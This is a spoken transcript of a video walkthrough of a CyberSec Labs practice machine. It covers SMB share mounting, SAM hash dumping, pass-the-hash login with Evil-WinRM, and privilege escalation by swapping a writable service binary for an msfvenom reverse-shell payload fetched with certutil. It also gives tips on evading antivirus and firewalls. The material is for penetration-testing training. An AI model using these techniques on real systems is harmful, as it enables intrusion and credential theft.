Welcome back to a new video. In this video, we're going to be solving another machine from CyberSec Labs. The machine name is, as you can see, it is Sam, and it seems to be turned off. So let me go ahead and turn it on. Okay, so this is a Windows machine. Basically, we're going to be demonstrating how can we crack and let's say I'm not going to say we will decrypt. I'm going to say let's see how we can dump the password hashes of the Windows system, right? And then we use the password hash to log in with a limited shell or the limited access, and then we will find a service that is writable. We will overwrite the service executable with our payload, and we will get reversal. So let's get started. So on the left, we can see the Nmap scan, which is done here. And as you can see, we have SMB shares on port 445.139, and we have remote desktop open. I have seen a couple of instances running remote desktop, but I haven't seen any use of them so far. We go down. All right, so we only have SMB and RDP. There is no HTTP, there is no FTP, there is no SSH. So this boils down the lab machine or the enumeration to only enumerating the RDP or the SMB file shares. Okay, to enumerate SMB file shares, as you know, guys, we have a command. Let me take out the command from here. It was somewhere SMB client. Okay, so here SMB client, and I specify the host. The host IP is, as you can see, ends with 18. The username, it's improvised. I put administrator. It could be something else. It's just for attempt. -n -u. When I hit enter, I should be able to list the SMB file shares. Right? Connection failed. Oh. Let me restart. So here, okay, the machine now is powered on. All right, let's go back. Desktop, and let's put sudo Seems to me the machine is still disconnected. Okay, let me run the command again. All right, so as you can see, the results. We have admin, backups, C, IPC. All the time I see admin, capital C, uppercase IPC. But here we have backup, right? Backups. So here, the next step is to mount this share, right? That's the next step. We will use a mount. I'm going to show you the command here. Mount. Where is mount? So mount is somewhere. All right, this is mount. All right, but before running mount, we should go ahead and create a directory, right, for the shares. Preferably, it could be mounts and shares. So sudo mount, and here is the type of the shares. CIFS, it stands for Common Internet File Sharing System. It's not NFS, it's CIFS. Since we are talking about SMB here, we have SMB, right? So most of the time, the sharing or the file shares are of the type CIFS, right? If we are enumerating NetBIOS, then based on the last video we published, it was like NFS, right? So when you have NetBIOS, the file type or the share type will be NFS. When you have SMB, by default, you would try with CIFS, Common Internet File Sharing. Here, the username, I put admin, right? And the password, I put like nothing, blank. And here I put the IP address or the host name. The share that I want to dump is backups, right from here. And the destination is mount shares 2. Once you hit enter, you will have the shares dumped to your local directory. So let's go to mint shares 2. And as we can see, we have like it seems to be the content of the C drive, right? So the sysadmin has dumped the content of the C drive into the shares, so everyone would be able to share them. Now, from the penetration testing perspective, until far, right? From the nmap, okay, forget if we omit the nmap scan on the left, everything we have done, right? You will not encounter this kind of stuff in the real world, right? There is no one until they are dumped and they don't have a clue about IT or cybersecurity would share these kind of files, right? It doesn't happen in the real world. It doesn't happen, believe me. But you would learn the commands to enumerate SMB clients, to enumerate the shares, to mount them. But until so far, there is nothing realistic to pen testing world, right? Except the nmap scan. Now we will get into what could be useful into the real world. So basically here I have Windows, right? And the machine name is Sam, which is indicative that I need to dump the content of the hash or dump the content of the SAM file, which contains the hashes, right? So let's go to Windows. Let's navigate to the SAM file. cd system32. cd config. Let's clear. Let's list the content. So we have system and we have SAM, and that is what is needed to dump the hashes. So what I would use is SAM dump to, I specify the system file, which is system. Let me make that wider, drag this to the left. All right, SAM, and here I will dump the content of the SAM file to home multisim desktop hashes.txt. Okay, when you hit enter, you will have dumped all of the hashes. Now let's navigate and explore what is in there. So nano, we forgot home here. Oh, all right. So here we go. We have the users. We have administrator, guest, Jamie, home group user. As you can see, the administrator is disabled, right? So we cannot log in with the administrator nor with the guest. So the only way to log in to the Windows system now is Jamie, right? And the NTLM hash is this one, right? This is the NTLM hash that we will be using to log in. How we will log in? We have two ways. We can log in either with the remote desktop service here, or we will use another tool to log in. The tool is Evil WinRM, which is the ultimate shell for these kind of purposes. It's kind of shell, right? I don't want to log in with RDP here. I want to log in with a shell. And by the way, Evil WinRM gives you PowerShell session, which is very preferable when you're doing such kind of test. All right, let's proceed now. So let's clear. Oh, I'm clearing in the wrong place. Okay, let's go to home. All right, now here I'm gonna type evil win. Oh, and then I specified the host IP, which is 172. Let's go up, grab the blue IP. Let's do that. And then we specify the username, -u. The username in our case, it's Jamie, I guess. And the hash. Oh, I forgot to take the hash. So nano home. So let me grab this one. So this is starts from 6 and ends with 1. Selection, labs. All right, there's something let's install the tool. I don't know, it hasn't found my system. So apt install RM. Oh, I don't have it. Let's download that. I'm not sure if this is true behavior of my system. Let me download it again. When evil when rm. So it is in GitHub. All right, so here let's download that with git clone. Let's go back. Let's copy that and go back to our terminal here. Oops. Sudo git clone. Oh, what's going on today? Okay. So let's see the evil. Okay. And let's run the tool now. Clear evil when rm. Or let's run that with Ruby. It's better. Ruby evil and rm. All right. So here we specify the host by using the I option, and here the IP. Dash udemy dash hash collapse. Oh, why is this happening? Just hate this. Okay. Okay, let's try to log in now. Sudo so I got some error. Cannot load such file. Load error. Okay, let's do gem. All right, let's now run the evil WinRM tool after I have installed the tool, but I have omitted the part from my video. You don't need to wait. So here is the command, and here I specified the NTLM hash from the file. So if we run here, we should be able to get some kind of reversal, or sorry, connection, partial, especially partial connection to the remote host. and we have successfully established the connection. So right now we are at the remote host with the user Jimmy. The first thing we do all the time, we see what are the privileges, right? Who am I? Dash priv. And you notice that PS, this is PowerShell session, right? Don't confuse that with the command prompt. So here, bypass traverse checking, increase process working set. We don't have impersonate, we don't have the kind of privileges we had in the past with the other labs machines. So the first thing I would like to do all the time is to enumerate the services, right? I want to see what are the services running, the non-standard ones, right? And they could be auto-started or they would be running manually. All right, in order to achieve that, I'm going to use a PowerShell command here. I'm copying that from the manual. And I'm going to paste that directly here. All the time, my objective is to look for the non-standard services. This is where I can access denied. Oh, okay. Let's use another method here. Task list. So if you get access denied with the PowerShell, you can use task list / svc to list the running services. Access denied. All right. What if we type services? That worked. Okay. So as you can see here, we have the list of the services, right? So I'm not interested in trying with that, nor this, nor this. These are Windows services, right? I'm interested in either Amazon or this one, Monitor 1 and Monitor 2. And the look of the application or the binary is kind of intriguing, right? So you see Monitor 2, Monitor 1. What is that? So if we consider that from the real world perspective, we need to try all of these, right? But the priority first, if we encounter such binary here, Monitor 1, Monitor 2, with such an odd name, to save time, we can try with that first. But if that doesn't work, we need to try with Amazon as well. So our objective here is either to derail, right? We need to derail the way the service work, right? The service works with the Monitor 1 app. If we can let the service work with another app or start another binary tool or payload of our choosing, so instead of Monitor 1 or Monitor 2, we let the service run our payload. So for that to happen, we need to check the permissions on the directory of services. So for that purpose, I need to use a tool called ICSLS or iCalcs. All right, and here I specified the path. It's going to be C services. Let's see if we can write there. So what was this? Successfully failed processing verified. Okay, these are the permissions. And to me, it appears that here, as you can see, we are the user. We are under users or here. So we don't have full control here, right? There is no full control on that. What has happened here? I typed something. Okay, let's go up. So over here, it doesn't seem to me that we can write to that directory services. So it means that we cannot move a payload right to that directory. So the other way around is we try to replace one of these apps with our own payload. Well, that requires us to have, the user here, requires us to have full control over one of these. Let's check that. So ICSLS, and here we paste. Let's try that. See if we have control over this binary. We can replace it or not. we're always looking for full control. So here, admin system user. So here, as you can see, we have full control over that from this one. So what we can do here, we can replace the file or replace the application here with our own payload, right? And restart the service, and we get reversal. We should be able to do that. Let's do horizontal splitting, and here sudo msf venom -p Windows interpreter reverse TCP lhost equal 10 1024 L ports equal 4545. Again, I'm going to restate that again. If you are doing that in real world and you want to put a payload, make sure to use evil. What was the name? What was the name of the tool? Veil evasion. Because you are doing here, we are transferring a binary. An executable file, right? If there is Windows Defender on the target system, it would block the running of this app or all payloads because it will be detectable, right? It will detect that there is a malicious executable being transferred to the remote host. So in the real world, we need to consider two aspects. The port 4545. Most firewalls block the outgoing connections with these ports. So try to use. Let's do that here. Let's do some port like below 1024. It could be 995. That would hopefully that would traverse the firewall rules because firewall rules cannot block ports below 1024 for the outgoing connections. -f exe, and the file name will be the same name like this one. So the monitor 2. Okay. Lport. The following options fail to validate Lport. I think because I'm running a non-root user, I can't choose port below 1024. So if you want to choose a port below 1024 like this one, switch your user to root and do that. For me, I'm gonna do here like 4545. So ls. So I have my payload ready here, right? Okay. Now let's run Python -d -m http server, and let's go up here and download that. So basically, I would type cert, or let's first go to the directory of the target directory. So here we would go to C services. I'm in the right directory. So cert util -url cache dash what was that? F, right? HTTP 10 10 54 and monitor 2.exe, and don't forget the port, and the name will be monitor 2.exe. Oh, what happened? So I guess I need to run that. What's wrong in this command here? Object not found. Okay, let me try something else. So if I try upload, maybe I need to execute that with the cmd here. So cmd.exe/c, and here I put the command, which is this one. Oh, Ah, look, the name. The name is wrong. So here, cert util. So let's see if it's gonna work. Operation timed out. Um, Try again. Oh, is it my IP? I think. Has my IP changed? Oh, I expected that. Collapse, it's 16. So here, oh, no, wait. Okay, so this is 16 here. All right, now it worked. Now, let's list the working directory, and here we have monitor 2. So the next step here is to run the reversal, the listener. Okay, so here I would collapse that. On new one, MSF console. Use exploits multi handler set payload windows with interpreter reverse TCP set lhost and 016 set lport 4555 set exit on session false run. Now here we need to restart the service, right? So in order to do that, we need to run some kind of command here. So we're going to use sc start monitor2. And we should be able to receive reversal here. Of course, if the service has actually been restarted. Let me try with cmd. Let's see. Sc start monitor2. Start service failed with error 216. Okay, let's stop the service then. Sc stop moni2. All right, start. Okay. Sc start monitor2. All right. Let's see if no here. The payload size is so it is 341. So directory 341. So why that do work? Let me go back here. Sudo msfnum -p Windows Flutter reverse TCP. Yes, because we have made a mistake in the L host. That's why it didn't work. 10.10.0.16 import 5 and -f exe. Here's going to be monitor 2.exe. Actually, you have put the wrong IP. That's why the connection hasn't worked. All right, now let's transfer that cert, or let's do that again from here. We have to command. Okay. Python p-m http.server. Okay. So let's see service. Oh, stop monitor 2. Let's see start monitor 1. 2. So what do I get? One. Monitor 2. Okay. So it is. Where is the file? Where is the binary? Where is my binary? Okay, it is this one. Which is very weird. Python p-m http.server. So this is the size of the payload. Let's compare that here. So monitor 2. So it's the same payload, right? I start to get suspicious. So let me clear rm-r monitor 2. Has it been removed? All right, clear. Let's do a new one. Okay. -c. Well, that worked. All right. So here, I don't know why when I typed st start monitor 2 didn't work, but I typed cmd it worked. Maybe only it responds when I type cmd here. I switched from PowerShell to command prompt. Apparently that's how it works. So if you start the service from the PowerShell, it won't start. You need to start it from the command prompt. So here we received the Metacritter session, and the only thing left to check is died. Oh God, why died? Why did you die? Set exit on session false. and run. Execute again. I don't want to see my session dies. I don't want to see it die. Okay, so as you can see, we have migrated from the current process to Notepad. But as you can see, the session died before the migration is complete. So let's see what's going to happen here. All right, that is very good. So I've migrated into another process, and although the session or the service has stopped in the window in the remote host, I guess our Meterpreter session will not die. It will continue. Let's find out. No response. Let me stop this. Run. Oh, here. So I hope my dashboard is quicker now. Needs to migrate before the service stops the remote host. Oh, interesting. Show options. Let's try again. We need to keep trying. There is no magic in here. Okay. So the service keeps closing, right? So let's do that. Let's stop the service. And here we put start again. But let's run the listener. Metasploit, run, start. Session is received. And again closed. I don't know what's the reason here. What is the reason why it worked here? Also no idea. Okay, set auto on script. Run. What was that? Post failed. Option validate error. The following options failed to validate session. Alright, session opened, and now session dies. Oh, so we migrated now. But as you can see, after migration, it has closed. The reason is there is something preventing the service from being on after we started. So it only works for like 5-6 seconds, and the interpreter here doesn't catch up to migrate before the service stops. Interesting. Maybe if we try with monitor 1, it would work. But that's the core of this machine, guys. I'm gonna try last time. For that reason, I'm gonna cancel. Let me okay, let's go. Let's show the options again. 4545. Maybe it's the port that's doing all the problem. So let's try last time. So here, let's make sure that let's go back here, find something about Autorun script. So it's Postman with minus migrate. Okay. Host, Windows, manage, migrate. I'm going to try for the last time. If it didn't work, maybe you try with monitor 1, but that's how it works actually. Once you get the session, you should get net authority system, or you should, once you get the session, by the time you get the session, you will be your privilege will be elevated to net authority system, right? But keeps closing in my case, no idea why. So as you can see, before I migrate, it keeps closing. So maybe try with monitor 1. I mean, replace the payload you have created with, instead of monitor 2, you may try with monitor 1. Let's do that. So let's go to vertical here. Okay. Sudo msf venom -p windows meter reverse TCP lhost 10 10 016 lport. I'm going to change that to 4544 4-f here monitor 1.exe. Oh gosh. So what is wrong now? Payload Windows meter reverse TCP lhost lport. Okay. What's wrong with this command? Sudo Windows. Oh, yeah. So here, okay. So 341, let's download that. Python 3-m http.server What was that? Oop! Address already in use? Where? Okay. I don't know where the address is in use. I can't understand this. Okay. So here's sudo move monitor 1. Alright, sudo service say init d batch cures restart. So let's do that from the regular port cert util -url cache -http -10 020 16 monitor 1.exe monitor. What's the problem now? Look, I'm very good at making typos. Very, very good. Okay. Now here, set L port. Let's change the port, 4544. And let's run. See if it's gonna work with monitor 1. It worked with monitor 2, but let's see if the session will die with monitor 1 here. So 1. So we receive the session now. Collapse this. Sending stage. One session is opened. Now next, the migration should take place. So it is the same. But anyway, that's how you're gonna do that. Just try it on your own. Maybe I have problem with my VPN connection, whatsoever the reason. But once you receive the session, when you try the lab on your own, it's going to be definitely privilege escalation. It's going to be net authority. But the takeaway from this lab is not the payload creation nor replacing the service. Many times, a regular user like Jamie or you or someone else on a Windows system has full access over some apps or some services. That's normal, and that's very ordinary. The non-ordinary is we have transferred the payload, which is executable here, to the remote system, which doesn't have an antivirus, right? If it had an antivirus, our payload would have worked unless we do some kind of obfuscation with field evasion to evade antivirus. That's the first thing from the reality perspective. The second thing from the reality perspective is that, as you remember, we were able to dump the shares of the remote system, and the shares are the system itself. Program files, 86, Windows, you will not encounter that in real life, right? So what enabled us to have this PowerShell session on the remote host is the non-realistic scenario of you being gifted with the passwords on a silver plate and logging in with evil WinRM, right? That's not going to work in real life. But overall, I like this lab. Maybe it doesn't resemble the real life so much. I mean, to a certain degree, there is some resemblance, right? In the privilege escalation, you look for the services that are writable by the current user. You replace that with their own payload, maybe not exe, maybe it's going to be PowerShell. Sometimes you need to create a PowerShell payload and replace the PowerShell payload with the target file. So that's it for this lab, and see you in the next video.